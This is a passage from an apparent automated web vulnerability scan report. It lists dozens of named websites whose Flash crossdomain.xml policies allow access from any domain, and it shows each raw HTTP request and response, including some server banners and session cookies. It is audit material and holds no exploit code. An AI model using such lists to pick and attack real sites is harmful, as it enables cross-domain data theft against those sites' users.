<allow-access-from domain="fe2.spielaffe.dev" />
...[SNIP]...
<allow-access-from domain="fe2.juegosmonitos.dev" />

<allow-access-from domain="www.spielesel.de" />
<allow-access-from domain="spielesel.de" />
...[SNIP]...

7.99. http://www.kswo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kswo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kswo.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:a0e"
Cteonnt-Length: 208
Expires: Tue, 03 May 2011 10:28:27 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:28:27 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.100. http://www.ktiv.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ktiv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ktiv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9f2"
Cteonnt-Length: 208
Expires: Tue, 03 May 2011 11:42:04 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 11:42:04 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.101. http://www.kwqc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kwqc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kwqc.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9f2"
Cteonnt-Length: 208
Expires: Tue, 03 May 2011 10:52:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:52:35 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.102. http://www.kzzp.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kzzp.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kzzp.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
Date: Tue, 03 May 2011 10:16:14 GMT
X-Varnish: 3145840870
Age: 0
Connection: close
X-Cache-Server: varnish04

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.103. http://www.landsharklager.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.landsharklager.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.landsharklager.com

Response

HTTP/1.1 200 OK
Content-Length: 360
Content-Type: text/xml
Last-Modified: Fri, 02 Jul 2010 14:50:19 GMT
Accept-Ranges: bytes
ETag: "807d1e3f519cb1:37d9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:48:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.104. http://www.littlebigplanet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.littlebigplanet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.littlebigplanet.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 18 Jan 2011 10:36:24 GMT
ETag: "4984c8-cc-49a1c78d79a00"
Vary: Accept-Encoding
Content-Type: text/xml
Cache-Control: max-age=86400,public
Content-Length: 204
Date: Tue, 03 May 2011 10:34:40 GMT
X-Varnish: 2241103063
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.105. http://www.lotto.pl/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lotto.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lotto.pl

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:35 GMT
Server: Apache
Last-Modified: Thu, 24 Feb 2011 11:57:21 GMT
Accept-Ranges: bytes
Content-Length: 226
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...

7.106. http://www.mapmyfitness.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mapmyfitness.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapmyfitness.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 11:29:55 GMT
Content-Type: text/xml
Content-Length: 199
Last-Modified: Fri, 12 Nov 2010 19:11:10 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.107. http://www.maxadds.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxadds.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.maxadds.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
Last-Modified: Thu, 23 Sep 2010 02:06:02 GMT
ETag: "9a8f72-dc-b4321680"
Accept-Ranges: bytes
Content-Length: 220
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?><cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="*"/> <allow-http-request-headers-from domain="*" headers="*"/></
...[SNIP]...

7.108. http://www.maxdome.de/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxdome.de
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.maxdome.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:20 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 15:01:32 GMT
ETag: "2d29db-e9-4a15ae66eeb00"
Accept-Ranges: bytes
Content-Length: 233
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.109. http://www.mbrgames.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mbrgames.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mbrgames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 02:16:45 GMT
ETag: "6dc000a-cc-49ef4b81d9d40"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.110. http://www.mercadolivre.com.br/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mercadolivre.com.br
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mercadolivre.com.br

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat) DAV/2
Last-Modified: Wed, 16 Feb 2005 12:30:23 GMT
Cache-Control: max-age=360
Expires: Tue, 03 May 2011 10:22:11 GMT
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 206
Date: Tue, 03 May 2011 06:14:00 GMT
X-Varnish: 2017767073
Age: 0
Connection: close
via: 1.1 Varnish (dblvarnish16)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.111. http://www.motorracingnetwork.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.motorracingnetwork.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motorracingnetwork.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Dec 2008 23:09:32 GMT
Accept-Ranges: bytes
ETag: "8e12fbb0ae5cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 347
Cache-Control: max-age=259904
Date: Tue, 03 May 2011 10:16:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.112. http://www.msgcu.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.msgcu.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msgcu.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:20 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 14:38:41 GMT
ETag: "7c06b7-cd-659abe40"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.113. http://www.mydivadoll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mydivadoll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mydivadoll.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:29 GMT
Server: Apache
Last-Modified: Mon, 17 Mar 2008 08:05:12 GMT
Accept-Ranges: bytes
Content-Length: 107
X-Server-ID: 93
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.114. http://www.netminers.dk/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netminers.dk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netminers.dk

Response

HTTP/1.1 200 OK
Content-Length: 336
Content-Type: text/xml
Last-Modified: Wed, 08 Jul 2009 13:12:48 GMT
Accept-Ranges: bytes
ETag: "7c8b65cacdffc91:39fde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:16:30 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.115. http://www.nowness.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nowness.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nowness.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Wed, 27 Apr 2011 18:07:12 GMT
Accept-Ranges: bytes
ETag: "b183f6ee55cc1:0"
Server: Microsoft-IIS/7.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: auid2010=GxvuZzBuFyXywHlPtmKgn741qMQhv9EdMvhI1pKkbBkmfp7MF6c2a_nVKK8OzChaHGM_gWm5blb7abbPbW238B-rTEr-TzSliUOYSYEPsTy5NRH0wLscJ1iXINweGReinNJhPuNn4Gyo4MSwnROZ8hAhYtQ1; expires=Tue, 03-May-2011 12:03:34 GMT; path=/; HttpOnly
sv: h-1
Date: Tue, 03 May 2011 11:03:34 GMT
Connection: close
Content-Length: 214

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-
...[SNIP]...

7.116. http://www.osobnosti.cz/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.osobnosti.cz
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.osobnosti.cz

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 11:32:07 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Fri, 29 Apr 2011 08:10:06 GMT
ETag: "13a936-4f-4a20a339ad380"
Cache-Control: max-age=0, must-revalidate
Expires: Mon, 02 May 2011 17:47:23 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 79

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.117. http://www.outsidethebeltway.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outsidethebeltway.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outsidethebeltway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 11:07:04 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 17 Jun 2008 13:27:15 GMT
ETag: "3800016-13a-44fdcb3d012c0"
Accept-Ranges: bytes
Content-Length: 314

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

7.118. http://www.paintthe88.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paintthe88.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paintthe88.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:02 GMT
Server: TMTS-ws
Last-Modified: Mon, 26 Jul 2010 04:41:46 GMT
ETag: "1c09c-4f-811680"
Accept-Ranges: bytes
Content-Length: 79
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.119. http://www.pentaximaging.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pentaximaging.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pentaximaging.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:27 GMT
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3600
Content-Length: 205
Content-Type: text/xml
Last-Modified: Thu, 09 Jul 2009 20:24:00 GMT
Accept-Ranges: none
ETag: "0b06031d30ca1:2dc"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.120. http://www.playingforchange.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.playingforchange.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playingforchange.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:04 GMT
Server: Apache/2.2.15 (EL)
Last-Modified: Tue, 31 Aug 2010 23:27:14 GMT
ETag: "56c61b-e6-48f26ebc61880"
Accept-Ranges: bytes
Content-Length: 230
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...

7.121. http://www.playmymovs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.playmymovs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playmymovs.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:24:49 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Sat, 23 Apr 2011 10:40:45 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

7.122. http://www.playsportstv.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.playsportstv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playsportstv.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:30 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4 mod_ssl/2.2.4 OpenSSL/0.9.8e JRun/4.0
Last-Modified: Thu, 19 Mar 2009 18:53:51 GMT
ETag: "6e-c6-522f6dc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: application/xml

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.123. http://www.podfeed.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.podfeed.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.podfeed.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 304
Content-Type: text/xml
Last-Modified: Fri, 28 Aug 2009 15:16:08 GMT
Accept-Ranges: bytes
ETag: "1fd13d78f227ca1:a2e"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:17:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.podfeed.net" />

...[SNIP]...
<allow-access-from domain="podfeed.net" />
<allow-access-from domain="*" />
...[SNIP]...

7.124. http://www.pordeo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pordeo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pordeo.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1800
Content-Length: 585
Content-Type: text/xml
Last-Modified: Tue, 21 Apr 2009 16:47:34 GMT
Accept-Ranges: bytes
ETag: "2414badea0c2c91:8095"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-access-from domain="localhost" />
   <allow-access-from domain="*.pordeo.com" />
   <allow-access-from domain="pordeo.com" />
   <allow-access-from domain="stream.xred2.com" />
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.125. http://www.ppcgeeks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ppcgeeks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ppcgeeks.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:41:32 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: bbsessionhash=8c1e63e087ba99ff54cd6d7770e823b7; path=/; domain=.ppcgeeks.com; HttpOnly
Set-Cookie: bblastvisit=1304422892; expires=Wed, 02-May-2012 11:41:32 GMT; path=/; domain=.ppcgeeks.com
Set-Cookie: bblastactivity=0; expires=Wed, 02-May-2012 11:41:32 GMT; path=/; domain=.ppcgeeks.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.126. http://www.princesshouse.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.princesshouse.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.princesshouse.com

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/xml
Last-Modified: Tue, 09 Nov 2010 15:56:19 GMT
Accept-Ranges: bytes
ETag: "a33033a62680cb1:1cec"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:52:38 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...

7.127. http://www.royalvegas.eu/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.royalvegas.eu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.royalvegas.eu

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 14 Mar 2011 07:38:56 GMT
Accept-Ranges: bytes
ETag: "7a85cedf1ae2cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Tue, 03 May 2011 10:59:41 GMT
Connection: close
Content-Length: 218

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cr
...[SNIP]...

7.128. http://www.rp-online.de/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rp-online.de
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rp-online.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:33 GMT
Server: Apache/2.2.8
Last-Modified: Wed, 18 Nov 2009 09:43:47 GMT
ETag: "fb7518-163-478a21445dac0"
Accept-Ranges: bytes
Content-Length: 355
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.129. http://www.sekindo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sekindo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sekindo.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1632595279"
Last-Modified: Thu, 12 Jun 2008 08:14:00 GMT
Content-Length: 200
Connection: close
Date: Tue, 03 May 2011 10:29:29 GMT
Server: lighttpd/1.4.26

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.130. http://www.sfgotobat.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sfgotobat.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sfgotobat.com

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/xml
Last-Modified: Thu, 09 Dec 2010 15:52:33 GMT
Accept-Ranges: bytes
ETag: "338ced17b997cb1:674"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:21 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

7.131. http://www.sheezyart.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sheezyart.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sheezyart.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3251366860"
Last-Modified: Mon, 02 Feb 2009 23:36:01 GMT
Content-Length: 338
Connection: close
Date: Tue, 03 May 2011 10:21:50 GMT
Server: lighttpd/1.4.26

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.132. http://www.skullcandy.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.skullcandy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skullcandy.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 11:13:47 GMT
Content-Type: text/xml
Connection: keep-alive
Last-Modified: Tue, 13 Apr 2010 15:53:17 GMT
Accept-Ranges: bytes
Content-Length: 102
Cache-Control: public
Expires: Thu, 02 Jun 2011 11:13:47 GMT
Vary: Accept-Encoding,User-Agent

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.133. http://www.smartvideochannel.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smartvideochannel.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smartvideochannel.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 110
Content-Type: text/xml
Last-Modified: Mon, 24 Nov 2008 21:46:30 GMT
Accept-Ranges: bytes
ETag: "61939d1c7e4ec91:7aa"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 11:25:15 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.134. http://www.songselect.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.songselect.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.songselect.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://www.songselect.com/crossdomain.xml
Last-Modified: Wed, 20 Oct 2010 17:16:14 GMT
Accept-Ranges: bytes
ETag: "b110e07f7a70cb1:236b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:31 GMT
Connection: close
Set-Cookie: Coyote-2-a481ec4=a4814be:0; path=/

